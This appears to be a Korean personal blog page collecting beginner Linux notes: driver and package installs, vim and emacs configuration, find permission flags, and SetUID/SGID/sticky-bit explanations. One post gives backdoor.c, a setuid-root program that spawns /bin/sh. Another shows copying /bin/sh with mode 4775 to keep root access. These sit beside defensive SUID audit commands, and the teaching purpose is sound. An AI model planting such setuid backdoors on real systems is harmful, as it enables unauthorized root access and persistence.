'예전것/Linux Basic'에 해당되는 글 14건

  1. 2012.02.04 Ubuntu 10.04 LTS intall
  2. 2010.06.03 vmware tool 설치 팁.
  3. 2010.04.02 vi setting
  4. 2009.09.07 SetUID를 이용한 해킹
  5. 2009.09.07 find 옵션에 +,- 붙은것들
  6. 2009.09.07 SETSUID에 대하여
  7. 2009.08.07 rlogin, rsh 설치
  8. 2009.08.04 CentOS 5.3 그래픽 드라이버 설치
  9. 2009.07.16 emacs의 설정
  10. 2009.07.16 리눅스에서 키설정 & 디버깅
예전것/Linux Basic2012. 2. 4. 17:13

intel hd graphic driver installation

sudo add-apt-repository ppa:glasen/intel-driver

sudo add-apt-repository ppa:kernel-ppa/ppa

sudo apt-get update

sudo apt-get upgrade

sudo apt-get install linux-image-generic-lts-backport-natty linux-headers-generic-lts-backport-natty 




docky installation

sudo add-apt-repository ppa:docky-core/stable

sudo apt-get update

sudo apt-get install docky


globalmenu

sudo add-apt-repository ppa:globalmenu-team/ppa
sudo apt-get update
sudo apt-get install gnome-globalmenu


synapse
  • sudo add-apt-repository ppa:synapse-core/ppa
  • sudo apt-get update && sudo apt-get install synapse


sudo add-apt-repository ppa:libreoffice/ppa


sudo nvidia-settings 해서 오류 나더라도

xorg.conf 에 저장을 꽉 눌러준뒤 재부팅하면  twin-view가 적용된다.


아래 명령어를 터미널에서 입력하면 셋팅되어 있는 값이 나온다. 

  1. $> gsettings get com.canonical.Unity.Panel systray-whitelist

  2. ['JavaEmbeddedFrame', 'Wine', 'scp-dbus-service', 'Update-notifier']


여기에 값을 추가하려면 get 부분을 set 으로 바꾸고, 위에 있던 기본 내용들을 모두 똑같이 적은 다음, Nabi 를 추가해야 한다.

  1. $> gsettings set com.canonical.Unity.Panel systray-whitelist "['JavaEmbeddedFrame', 'Wine', 'scp-dbus-service', 'Update-notifier', 'Nabi']"


이렇게 해주면 nabi 가 추가되고, 다시 로그인하면 정상적으로 트레이로 들어가 있는 것을 볼 수 있다.


'예전것 > Linux Basic' 카테고리의 다른 글

vmware tool 설치 팁.  (0) 2010.06.03
vi setting  (0) 2010.04.02
SetUID를 이용한 해킹  (0) 2009.09.07
find 옵션에 +,- 붙은것들  (0) 2009.09.07
SETSUID에 대하여  (0) 2009.09.07
예전것/Linux Basic2010. 6. 3. 23:32

Certainly help for me – had been trying update the Kernel for hours and this put me on the right track.

Using Vmware version of OpenEmm running Centos 5.

Couple of other commands that help me solve this:

1. Install packages to build the kernel modules
yum install gcc kernel-devel
2. Check the running kernel matches the kernel headers
uname -r # running kernel
rpm -q kernel-devel # installed kernel headers
5. If the two versions do not match, run
yum -y upgrade kernel kernel-devel
reboot
7. Find out where the kernel headers are
ls -d /usr/src/kernels/$(uname -r)*/include

Sourced this from http://www.thoughtpolice.co.uk/vmware/howto/centos-5-vmware-tools-install.html

Many thanks.

'예전것 > Linux Basic' 카테고리의 다른 글

Ubuntu 10.04 LTS intall  (0) 2012.02.04
vi setting  (0) 2010.04.02
SetUID를 이용한 해킹  (0) 2009.09.07
find 옵션에 +,- 붙은것들  (0) 2009.09.07
SETSUID에 대하여  (0) 2009.09.07
예전것/Linux Basic2010. 4. 2. 03:32
* vi 의 명령모드에서도 설정하나, 영구적으로 .vimrc 파일을 만들어 설정합니다.

$ sudo gedit ~/.vimrc    해서 .vimrc 에 다음 내용을 입력합니다.

set autoindent      " 자동으로 들여쓰기를 한다.
set cindent " C 프로그래밍을 할때 자동으로 들여쓰기를 한다.
set smartindent " 좀더 똑똑한 들여쓰기를 위한 옵션이다.
set textwidth=79 " 만약 79번째 글자를 넘어가면 \
set wrap " 자동으로 <CR>를 삽입하여 다음 줄로 넘어간다.
set nowrapscan " 검색할 때 문서의 끝에서 다시 처음으로 돌아가지 않는다.
set nobackup " 백업 파일을 만들지 않는다.
set visualbell " 키를 잘못눌렀을 때 삑 소리를 내는 대신 번쩍이게 한다.
set ruler " 화면 우측 하단에 현재 커서의 위치(줄,칸)를 보여준다.
set tabstop=3 " Tab을 눌렀을 때 8칸 대신 3칸 이동하도록 한다.
set shiftwidth=3 " 자동 들여쓰기를 할때 3칸 들여쓰도록 한다.
set number " 행번호를 사용한다.
set nobackup " 백업파일을 생성하지 않는다.
set fencs=ucs-bom,utf-8,euc-kr.latin1 "한글 파일은 euc-kr로 읽어들이며, 유니코드는 유니코드로 읽어들이도록 설정
set fileencoding=euc-kr " 실제로 파일을 저장할때 사용되는 인코딩은 euc-kr
set background=light " 하이라이팅 옵션
set expandtab " 탭을 입력하면 공백문자로 변환하는 기능을 설정
set hlsearch " 검색어를 구문강조해주는 기능
set ignorecase " 검색할 때 대소문자 무시하도록 하는 것.


if has("syntax")

syntax on " Default to no syntax highlightning

endif


"=================== 로케일 설정 =================================

if has("unix")

   set encoding=euc-kr

elseif has ("win32")

   set encoding=cp949

endif
"======================= UTF-8, euc-kr 한글문서 그냥 열기 ====================

if v:lang =~ "^ko"
    set encoding=cp949

   set fileencodings=utf-8,cp949

   set guifontset=-*-*-medium-r-normal--16-*-*-*-*-*-*-*
elseif v:lang =~ "^ja_JP"
    set fileencodings=euc-jp


   set guifontset=-misc-fixed-medium-r-normal--14-*-*-*-*-*-*-*


   elseif v:lang =~ "^zh_TW"


   set fileencodings=big5


   set guifontset=-sony-fixed-medium-r-normal--16-150-75-75-c-80-iso8859-1,-taipei-fixed-medium-r-normal--16-150-75-75-c-160-big5-0
elseif v:lang =~ "^zh_CN"
set fileencodings=gb2312


set guifontset=*-r-*
endif
if v:lang =~ "utf8$" || v:lang =~ "UTF-8$"
    set encoding=utf-8


   set fileencodings=utf-8,cp949
endif



"================= Key 매핑 ========================
map <PageUp> <C-U><C-U> "맨 위로


map <PageDown> <C-D><C-D>  "맨 마지막으로


map <F2> :25vs ./<CR>   "F2: 탐색기 열기


map <F3> :only<CR>    "창 최대화


map <F12> v]} zf "폴딩



"================= Gcc 컴파일 & 실행 설정 ==============
map <F9> :w!<cr> "현재 작업 저장


map <F10> :!g++ -W -Wall -O2 -g % -o %<<cr>  "컴파일


map <F11> :!%<<cr> "실행




'예전것 > Linux Basic' 카테고리의 다른 글

Ubuntu 10.04 LTS intall  (0) 2012.02.04
vmware tool 설치 팁.  (0) 2010.06.03
SetUID를 이용한 해킹  (0) 2009.09.07
find 옵션에 +,- 붙은것들  (0) 2009.09.07
SETSUID에 대하여  (0) 2009.09.07
예전것/Linux Basic2009. 9. 7. 22:16

SetUID는 보안에 치명적일수 있다고 전에 배웠다.
참고 : http://cheesev.tistory.com/entry/aboutSetUID

위 그림처럼 원본의 bash쉘을 /tmp 에 복사하고 4755 권한을 주었다.


원래 SetUID개념이라면 root권한으로 실행이 되어서 rm -rf 명령으로 지워져야하지만 이에 대한 보안노력이 있어 잘 먹히지 않는다. 약간의 트릭으로 이를 피해보자

backdoor.c라는 소스를 코딩하여 컴파일
#include<stdio.h>
main(){
        setuid(0);
        setgid(0);
        system("/bin/sh");
}

#gcc -o backdoor backdoor.c
#chmod 4755 backdoor
을 수행한후

#./backdoor
를 쳐보면

쉘 권한이 바뀐것을 볼 수있다.

아까 지우지 못했던 파일하나를 지워보자. 지워진다.



'예전것 > Linux Basic' 카테고리의 다른 글

vmware tool 설치 팁.  (0) 2010.06.03
vi setting  (0) 2010.04.02
find 옵션에 +,- 붙은것들  (0) 2009.09.07
SETSUID에 대하여  (0) 2009.09.07
rlogin, rsh 설치  (0) 2009.08.07
예전것/Linux Basic2009. 9. 7. 00:38
지식in에서 퍼옴
▶▶질문
find /home/guest -perm 744 // 권한이 744인 파일만 찾기
find /home/guest -perm -744 // ?
find /home/guest -perm +744 // ?
두 번째와 세 번째 명령에서 -, +가 붙으면 무슨 차이가 있나요?


▶▶답변
퍼미션은 권한을 나타내는 2진수들의 조합된 값입니다.

예들들어서 사용자 읽기 권한은 9번재 비트이며
2진수로 표기하면 100000000
8진수로 표시하면 400 입니다.

2진수 표현을 시각적으로 좀더 보기 쉽게 만든 것이 ls -l 했을 때 나오는 rwxr-xr-x 방식입니다.

100000000  = 400
r--------

11000000 = 600
rw------

8진수 표현을 많이 사용하는 이유는 3비트씩 딱 나눠서 떨어지기 때문입니다.
8진수 숫자 1자리는 3비트를 나타내기 때문에
읽기,쓰기,실행 3개를 하나의 숫자로 표현할 수 있기 때문이죠.

질문으로 돌아가서

-perm 744 는 권한이 정확하게 744인 경우입니다.

ls로 봤을때 rwxr--r-- 로 나오는 것이죠.


-perm -744 는 744(rwxr--r--)에 해당되는 퍼미션 비트를 모두 포함하고 있는 경우입니다.

rwxr--r-- (744), rwxr-xr-x (755) rwxrw-r-- (764)  등등등 이 모두 포함되겠죠.

-퍼미션은 권한의 최소값(?) 같은 개념이라고 생각하시면 되겠네요.


-perm +744 는 744에 해당되는 퍼미션 비트중 어느 하나라도 포함하고 있는것입니다.

r-------- (400), rw------- (600), ------r--(004) ... 등등 무지 많은 경우가 나오겠죠.

그래서 +퍼미션은 보퉁 하나나 두가지 정도의 아주 제한된 값을 조건으로 줄때 쓰는것입니다.


그룹 쓰기 권한, 또는 모든 사용자 쓰기 권한이 있는 파일은?  -perm +022

root 소유이면서 suid 비트+실행 권한을 가진 파일은? -user root -type f -perm -4111
(이건 보안 점검 같은때 많이 사용할 법한 명령입니다.
일반 사용자가 root 권한으로 실행할 수 있는 명령을 찾는거져)

'예전것 > Linux Basic' 카테고리의 다른 글

vi setting  (0) 2010.04.02
SetUID를 이용한 해킹  (0) 2009.09.07
SETSUID에 대하여  (0) 2009.09.07
rlogin, rsh 설치  (0) 2009.08.07
CentOS 5.3 그래픽 드라이버 설치  (0) 2009.08.04
예전것/Linux Basic2009. 9. 7. 00:31

★ SETUID에 대하여....

유닉스/리눅스 시스템에서의 파일모드는 아래와 같이 세자리 숫자로 되어 있다.
즉, 755(-rwxr-xr-x), 644(-rw-r--r--)와 같은 조합을 이루고 있다.

그런데 여기에 한자리의 숫자가 맨앞에 하나더 있다. 즉, 755의 경우 0755가 되는 것이다.
맨 앞의 숫자는 다음과 같은 의미를 가진다(0은 아무런 설정도 되어있지 않음을 의미).

SetUID
4
이 부분이 설정되면 실행시 그 파일의 소유자 권한으로
실행된다. 따라서 누가 그 파일을 실행하게 되면 실행시 실제로 그 파일의 소유권을 가진
유저가 실행하는 것과 같은 의미를 가지게 된다. 설정되면 권한에서 소유자의 실행(x)부분이
"s", "S"로 나타나게 된다.

SetGID
2
이 부분이 설정되면 실행시 그 파일의 소유그룹의 권한으로 실행된다. 위와 같은 의미이고,
설정되면 권한에서 소유그룹의 실행(x)부분이 "s", "S"로 나타난다.

Sticky bit
1
이 부분은 해당 파일의 소유자에게만 쓰기 권한을 제공한다. 이 부분이 설정되면
해당파일, 디렉토리는 public에게 쓰기가 되어있다고 하더라도 해당파일의 소유자가 아니면
쓰기에 관련된 작업을 할 수 없다.
설정되면 public의 실행(x)부분이 "t", "T"로 나타난다.  

[SetUID, SetGID, sticky bit의 의미]

SUID, SGID, Sticky bit의 설정과 제거는 아래와 같이 chmod 명령으로 한다.
○ SUID
chmod u+s filename : filename 파일의 user에게(u) SUID 비트를(s) 부여한다.
or,
chmod 4*** filename : SUID 비트는 8진수로 4의 값을 갖는다. *** 자리에는 755 등과 같은
기존의 8진수 모드 값이 오게 된다.

[ex]

위에서 xl이라는 스크립트에 SUID를 설정할 경우,

[bluesky@bluestar bluesky]# ls -l xl

-rwxr-xr-x 1 root root 2886 Apr 29 2000 xl

[bluesky@bluestar bluesky]# chmod u+s xl

[bluesky@bluestar bluesky]# ls -l

-rwsr-xr-x 1 root root 2886 Apr 29 2000 xl


이렇게 suid 비트가 설정이 되면 다른 유저가 xl이라는 스크립트를 실행할 때 루트의 권한을
가질수 있게 된다. 

○ SGID
chmod g+s filename : filename 파일의 group에게(g) SGID 비트를(s)를 부여한다.
or,
chmod 2*** filename : SGID 비트는 8진수로 2의 값을 가진다. 마찬가지로, *** 자리에는
755와 같은 기존 8진수 모드의 값이 온다.

[ex]
위에서 xlock-exploit라는 스크립트에 SGID를 설정할 경우,

[bluesky@bluestar bluesky]# ls -l xlock-exploit

-rwxr-xr-x 1 root root 6018 Apr 29 2000 xlock-exploit

[bluesky@bluestar bluesky]# chmod g+s xlock-exploit

[bluesky@bluestar bluesky]# ls -l xlock-exploit

-rwxr-sr-x 1 root root 6018 Apr 29 2000 xlock-exploit  

○ Sticky bit

chmod o+t filename : filename 파일 또는 디렉토리에 Sticky bit를 부여한다.

chmod 1*** filename : Sticky bit의 8진수 값은 1이다.

[ex]

예를 들어, 위에서 shell_scripts라는 디렉토리에 sticky bit를 설정하려고 할 경우,

[bluesky@bluestar bluesky]# ls -l shell_scripts

drwxrwxr-x 2 bluesky bluesky 1024 Apr 20 2000 shell_scripts

[bluesky@bluestar bluesky]# chmod o+t shell_scripts

[bluesky@bluestar bluesky]# ls -l shell_scripts

drwxrwxr-t 2 bluesky bluesky 1024 Apr 20 2000 shell_scripts


각각의 설정을 제거하려고 할 경우는 + 대신에 -를 사용한다.

그리고 위에서 SUID, SGID, Sticky bit 설정시 실행(x)부분에 "s", "S"
또는 "t", "T"로 나타난다고 했는데, 소문자의 경우는
이미 기존의 파일에 실행권한이 부여되어 있는경우에 SUID,SGID,Sticky bit를
설정시에 나타나게 되고, 대문자(S, T)의 경우는 기존의 파일에 실행권한이
없는 상태에서 SUID, SGID, Sticky bit를 설정할 경우에 나타나게 된다.
즉, 대문자인 경우는 기존 파일의 권한에서 실행권한이 없는 상태에서 설정했기
때문에 SUID,SGID 등을 설정해도 실행은 되지 않는다. 즉, 대문자로 나타나는
경우는 동작되지 않음을 의미한다.


예를 들어 아래와 같이 실행권한이 없는 suid란 파일에 SUID 비트를 설정해보면,

[bluesky@bluestar bluesky]# ls -l suid

-rw-rw-rw- 1 bluesky bluesky 2290 May 6 2000 suid <- 실행권한 없음

[bluesky@bluestar bluesky]# chmod u+s suid

[bluesky@bluestar bluesky]# ls -l suid

-rwSrw-rw- 1 bluesky bluesky 2290 May 6 2000 suid <- 대문자 S

[bluesky@bluestar bluesky]# ./suid

bash: ./suid: Permission denied


지금까지는 전반적인 내용과 설정법에 대해 알아보았는데, 그렇다면 실제로 유닉스
시스템에서 어떻게 사용되고 있는지 알아보자.


유닉스/리눅스 시스템에서 사용자가 자신의 패스워드를 바꾸려고 할 때
passwd(/usr/bin/passwd)란 명령을 사용한다. 이 명령을 사용하여 사용자는
/etc/passwd란 파일을 수정하여 자신의 패스워드를 변경하게 된다.

그런데 /etc/passwd란 파일의 접근권한을 보면,

[bluesky@bluestar bluesky]# ls -l /etc/passwd

-rw-r--r-- 1 root root 930 Mar 5 04:38 /etc/passwd


즉, root 유저만 이 파일을 수정할 수가 있다. 그런데 어떻게 일반 사용자가
이 파일을 수정하여 자신의 패스워드를 변경할 수가 있는가??


그 비밀은 passwd(/usr/bin/passwd)란 파일의 접근권한(즉, SUID)에 있다. 이 파일의
접근권한을 보면,

[bluesky@bluestar bluesky]# ls -l /usr/bin/passwd

-r-sr-xr-x 1 root bin 58306 Apr 13 1999 /usr/bin/passwd


위와 같이 /usr/bin/passwd란 파일은 root 유저에게 SUID 비트가 설정되어 있다.
그러므로 일반 사용자들도 이 파일을 실행하고 있는 동안에는 root의 권한을
잠시 빌려쓸 수 있게 되고 그리하여 root 만 변경할 수 있는 파일인 /etc/passwd 파일도
수정하여 자신의 패스워드를 변경할 수가 있는 것이다.

 

이번에는 Sticky bit의 사용에 대해 알아보자.

유닉스/리눅스 시스템에서 /tmp 디렉토리의 권한을 보면,

[bluesky@bluestar bluesky]# ls -l /tmp

drwxrwxrwt 15 root root 1024 Mar 8 23:27 tmp


위를 보면 /tmp 디렉토리의 권한이 1777(rwxrwxrwt)로 설정되어 있다.
이 디렉토리가 sticky bit가 설정이 되어 있는데, 일반적으로 /tmp 디렉토리는
많은 유저들이 임시적으로 파일을 생성하거나 복사하여 작업하는 디렉토리이다.

그런데 만약 A라는 유저가 파일을 /tmp 에 만들었는데 B라는 유저가 이 파일을
보고 지워버린다면 어떻게 되겠는가??
바로 이런 불상사를 막기 위해서 /tmp 디렉토리에 sticky bit가 설정되어 있는데
이렇게 sticky bit가 설정되어 있으면 해당 디렉토리내에서 다른 유저들이 만들어
놓은 파일들을 보거나 실행은 가능하지만 지우거나 변경을 할 경우에는
반드시 그 파일의 소유자의 권한이 있어야만 한다. 즉, 해당 파일의 소유자만이
그 파일을 변경하거나 지울 수가 있는 것이다.

이러한 suid는 위와 같이 매우 유용하게 사용될 수 있는 반면 보안상으로 매우
취약한 약점을 가지고 있다. 여기서 suid가 왜 문제가 되는지 간단한 예를 하나 들어보자.


예를 들어 시스템 관리자가 관리자용으로 따로 만든 계정이 아닌 그냥 root로 작업을
하고 있다가 잠시 자리를 비웠다고 가정해 보자.
이때, 이 시스템에 hacker란 계정을 가진 사람이 들어와서 아래와 같이 했다면 큰일이다.

[root@bluestar /root]# cp /bin/sh /home/hacker

[root@bluestar /root]# chmod 4775 /home/hacker/sh

[root@bluestar /root]# ls -l /home/hacker/sh

-rwsrwxr-x 1 root root 373304 Mar 23 04:05 /home/hacker/sh


위와 같이 해두면 hacker란 사용자는 다음에 자신의 계정으로 로긴한 후 이 훔친
shell(일종의 백도어이다.)을 이용하여 언제라도 root가 될 수 있으니 얼마나 위험한
일인가...다음은 그 과정을 보여준다.

[hacker@bluestar hacker]$ <-- hacker가 자신의 계정으로 로긴..

[hacker@bluestar hacker]$ whoami

hacker

[hacker@bluestar hacker]$ ls -l

-rwsr-xr-x 1 root root 373304 Mar 23 04:05 sh

[hacker@bluestar hacker]$ ./sh <-- root의 권한으로 shell을 실행시킴(root shell 획득...)

[hacker@bluestar hacker]#whoami(프롬프트가 $->#으로 바뀐것을 주목..)

root

이후의 일은 끔찍함 그자체.... ^_^


그러므로 시스템 관리자는 화면 잠금없이 자리를 비우는 일이 없도록 해야하며,
수시로 아래명령으로 불필요하게 suid/sgid 설정이 되어있는 화일이 없는지 확인해야 한다.
(보안툴을 이용해서 점검이 가능..)

[root@bluestar /root]# find / -perm -4000 -o -perm -2000 -print

위에서 SUID,SGID에 대해서 알아보았는데, 만약 중요한 실행파일들이 사용자들에게
root의 소유이면서 suid가 설정되어 있다면 그 실행파일로 인해서 대부분의 침입자들은
root 유저의 권한을 얻거나 시스템을 파괴하려들 것이다. 따라서 불필요한
SUID는 제거해야 한다. 시스템에 있는 모든 SUID/SGID를 찾아내어 그러한 설정 비트들이
왜 붙어 있는지를 따져보고 불필요한 suid, sgid라면 제거를 해야하고, 만약 전에
없던 suid 비트가 어떤 실행파일에 설정되어 있다면 침입의 여부를 꼼꼼히 살펴보아야 할 것이다.


suid/sgid가 설정된 파일을 찾을 때는 아래와 같은 명령을 사용한다.


[bluesky@bluestar bluesky]# find / -type f ( -perm -04000 -o -perm -02000 )

or,

[bluesky@bluestar bluesky]# find / -perm -4000 -o -perm -2000 -print 2>/dev/null


이렇게 해서 나온 결과들을 보고 해당 실행파일에 불필요하게 suid/sgid가 설정이 되어
있다면 바로 제거해야 한다. suid와 sgid는 잠재적인 보안 위험 요소이며 철저하게 감시되어야 한다.

만약 크래커가 여러분의 시스템에 사용권을 얻게되고, 특히 시스템 파일이나 월드 라이터블(World-writable)
파일들을 변경할 수 있게되면 심각한 보안 개구멍이 존재하게 된다.(월드 라이터블이란 public 부분이
쓰기 가능한 경우이다. 즉, "--------w-"의 권한 비트를 말한다)
또한 월드-라이터블 디렉토리도 위험하다. 그래서 이러한 파일 및 디렉토리들도 찾아보고 왜
"쓰기가능"으로 설정되어 있는지 따져보아야 하며 불필요한 경우에는 "쓰기가능"을 제거해 주어야 한다.

정상적인 운영에 있어서 /dev의 일부와 심볼릭 링크를 포함한 여러 파일들이 라이터블로 되어 있을 수 있다.


이러한 World-writable 파일들을 찾는 명령은 아래와 같다.

[bluesky@bluestar bluesky]# find / -perm -2 -print


또한 무소속의 파일들 또한 침입자가 시스템에 들어왔다는 징후일 수 있으므로 주인이 없거나 그룹에
소속되어 있지 않는 파일들이 없는지 아래의 명령으로 찾아보아야 한다.

[bluesky@bluestar bluesky]# find / -nouser -o -nogroup -print


마지막으로 리모트 호스트(.rhosts) 파일들 또한 반드시 살펴보아야 한다. 시스템내의 /home 디렉토리 내의 임의의
사용자의 디렉토리내에 이러한 파일이 있다는 것은 시스템에 암호없이 들어올 수 있는 특정 호스트가 존재한다는 것이기
때문에 매우 위험하다.

이러한 .rhosts 파일들을 찾기위해서는 다음과 같이 한다.

[bluesky@bluestar bluesky]# find /home -name .rhosts -print

/home/bluesky/.rhosts

[bluesky@bluestar bluesky]# rm /home/bluesky/.rhosts

rm: remove `/home/bluesky/.rhosts'? y 

[출처] SETUID에 대하여....|작성자 ca66044

다른곳. setuid setgid 설명되어있는곳
http://lovelettee.tistory.com/tag/sgid

'예전것 > Linux Basic' 카테고리의 다른 글

SetUID를 이용한 해킹  (0) 2009.09.07
find 옵션에 +,- 붙은것들  (0) 2009.09.07
rlogin, rsh 설치  (0) 2009.08.07
CentOS 5.3 그래픽 드라이버 설치  (0) 2009.08.04
emacs의 설정  (0) 2009.07.16
예전것/Linux Basic2009. 8. 7. 00:19
http://werdream.egloos.com/398482

여기에 잘 나와있다.

'예전것 > Linux Basic' 카테고리의 다른 글

find 옵션에 +,- 붙은것들  (0) 2009.09.07
SETSUID에 대하여  (0) 2009.09.07
CentOS 5.3 그래픽 드라이버 설치  (0) 2009.08.04
emacs의 설정  (0) 2009.07.16
리눅스에서 키설정 & 디버깅  (0) 2009.07.16
예전것/Linux Basic2009. 8. 4. 10:40
Nvidia 사의 캐간지 그래픽 카드 Geforce 6600 GE 를 가지고있는데 CentOS를 처음 설치하면
성능발휘가 안된다...

step 1
일단 www.nvidia.com  을 방문하자 그곳에서 자신에게 맞는 그래픽 드라이버를 찾고 다운로드한다.
(언어를 한글로하면 다운이 안되더라.. 영어로 맞추고 가면 되더라) 

step 2
이게 x-window상에서는 설치가 안된다.
#sbin/init 3 명령으로 텍스트모드로 전환하고 바로 설치하면 머머가 또 안된다고 뜬다.
바로 gcc와 kernel-devel이 설치 안되서 그런것!(kernel-devel이란? provides kernel headers and makefiles sufficent to build modules against the kernerl package)
바로 설치하자

#yum -y install gcc kernel-devel

step 3
그래도 안된다는 문구를 볼 수 있을것이다. 이는 kernel source path 가 어딘지 설치프로그램이 인식하지 못해서 생기는 문제로 생각된다. (기본이 /usr/src/linux 인듯하다. 이것과 다르면 어딘지 모르겠다고 나온다.)
나의 경우엔 /usr/src/kernel/2.6...(어쩌고 커널버전 ~~)에 있었다.
- 이것이 kernel-devel을 설치해야 보이는 경로일것이다.
따라서 이 경우에는 kernel-source-path 를 지정해 줘야한다.

#sh NVDIA-(어쩌고..설치파일) --kernel-source-path=(설치된곳)

끝. 설치가 아주 잘된다. 에러도 없다.  마지막에 x윈도우에 머 설정할거냐 하는데 그냥 yes

시스템이 재부팅?(잘기억이 나지 않는다. /sbin/init 5로 다시 들어갔었나..)
되고 알아서 모니터에 맞게 되해상도를 찾아주었다.
귀엽다.




'예전것 > Linux Basic' 카테고리의 다른 글

SETSUID에 대하여  (0) 2009.09.07
rlogin, rsh 설치  (0) 2009.08.07
emacs의 설정  (0) 2009.07.16
리눅스에서 키설정 & 디버깅  (0) 2009.07.16
NFS 간단설정  (0) 2009.07.12
예전것/Linux Basic2009. 7. 16. 22:29
참조: 거의 모든것이 설명되어있다!!
http://wiki.kldp.org/wiki.php/EmacsTinyTips#s-3.7

First
emacs를 사용하기 위해 기본적으로 명령어를 알자 ctrl+h t 를 누르면 튜토리얼 모드로 들어간다.
이곳에서 emacs의 명령과 사용방법을 볼 수 있다.

Second
본격적인 설정이다.
http://www.emacswiki.org/cgi-bin/wiki/ColorTheme#toc2
이곳을 보고 우선 Color-theme를 설치하자. 영어로 되어있지만 해석하고 설치(installing부분만)
M-x color-theme-select로 ColorTheme를 설정할 수 있다.

또, C언어를 하는데 syntax마다 색깔을 다르게 주고싶을 것이다. (여느 다른 프로그램처럼)

emac를 띄운 상태에서 M-x font-lock-mode 라고 치거나(M-x 는 보통 Alt+x

설정파일(.emacs 등) 에 다음을 넣어라.

(add-hook 'c-mode-hook 'turn-on-font-lock)

◆개별 사용자에게 적용하려면 .emacs에 하는게 맞지만 모든 사용자가 그렇게하도록

/usr/share/emacs/site-lisp/site-start.el 파일에 위 내용을 추가하였다.


---나머지 설정---

처음 emacs를 설치하면 font가 형편없다. 내가 좋아하는 font로 설정해주자.

http://wiki.kldp.org/wiki.php/EmacsChangeFonts

이곳을 보고 따라하자.

내경우엔

ln -s .Xdefaults .Xdefaults-$HOSTNAME (심볼릭링크를 걸어라!)

을 해주어야지 .Xdefaults 파일을 emacs에서 제대로 읽었다. (CentOS 5.3사용중, 예전에는 .Xdefaults였으나 바뀌었다고 한다.)


자 이것으로 emacs 설정 끝

'예전것 > Linux Basic' 카테고리의 다른 글

rlogin, rsh 설치  (0) 2009.08.07
CentOS 5.3 그래픽 드라이버 설치  (0) 2009.08.04
리눅스에서 키설정 & 디버깅  (0) 2009.07.16
NFS 간단설정  (0) 2009.07.12
BASH SHELL LAB EXERCISE  (0) 2009.06.08
예전것/Linux Basic2009. 7. 16. 01:09

디버깅을 위해 참조하자
http://wiki.kldp.org/wiki.php/EmacsGdbEtagsCscope

 - console상에서의 키 설정 : loadkeys 이용한다.
키보드상의 Caps Lock과 Ctrl 키를 바꾸려면 아래와 같이 하면 된다. (keymaps 0-15를 사용한다고 가정했다. dumpkeys | head -1로 확인해볼 수 있다.)

        % loadkeys        keymaps 0-15        keycode 58 = Control        keycode 29 = Caps_Lock        %
 
위에 내용을 차례대로 한줄씩 입력 다 하고 EOF해야하던데...ctrl+d던가

디버깅으로 돌아와서 cscope 사용하는데 설정 문제가 좀있다. 기본적으로 리눅스 설치했을때 cscope는 설치가 안되어있다. emac에서 cscope가 구동되게 하기위해서 아래와 같은 작업을 한다.
#yum -y install cscope
로 설치 
1. <alt+x>load-library /usr/share/emacs/site-lisp/xcscope.el
위와같이하면 cscope를 사용할 수 있다. 하지만 매번 해줘야하므로 다음과같이한다.
#vi /usr/share/emacs/site-lisp/site-start.el
(load-library "xcscope.el") 을 추가한다.   //주의 : 반드시 괄호를 넣어라. " " 안에 들어가는것은 라이브러리

http://wiki.kldp.org/wiki.php/EmacsInstallScript
이곳에 더 자세한 설명이 나와있다.

'예전것 > Linux Basic' 카테고리의 다른 글

CentOS 5.3 그래픽 드라이버 설치  (0) 2009.08.04
emacs의 설정  (0) 2009.07.16
NFS 간단설정  (0) 2009.07.12
BASH SHELL LAB EXERCISE  (0) 2009.06.08
.bash_profile , hash  (0) 2009.06.04